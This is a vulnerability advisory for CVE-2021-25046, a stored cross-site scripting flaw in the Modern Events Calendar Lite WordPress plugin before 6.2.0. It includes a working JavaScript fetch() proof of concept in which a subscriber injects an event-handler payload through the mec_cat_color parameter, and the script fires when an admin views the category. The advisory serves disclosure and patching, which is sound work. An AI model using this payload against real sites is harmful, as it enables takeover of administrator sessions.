Modern Events Calendar Lite < 6.2.0 – Subscriber+ Category Add Leading to Stored XSS | CVE 2021-25046

Description

The plugin alloed any logged-in user, even a subscriber user, may add a category whose parameters are incorrectly escaped in the admin panel, leading to stored XSS.

Proof of Concept

1. Run the following JavaScript in the browser's web console as a subscriber user.
2. Authenticate in a separate browser as an admin user.
3. Go To "M.E. Calendar" -> Categories -> and click on "category" link.


fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"mec_popup_event_category","mec_cat_color": 'color" onfocus=alert(1) autofocus=', "category": "category", "mec_cat_icon": "icon"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));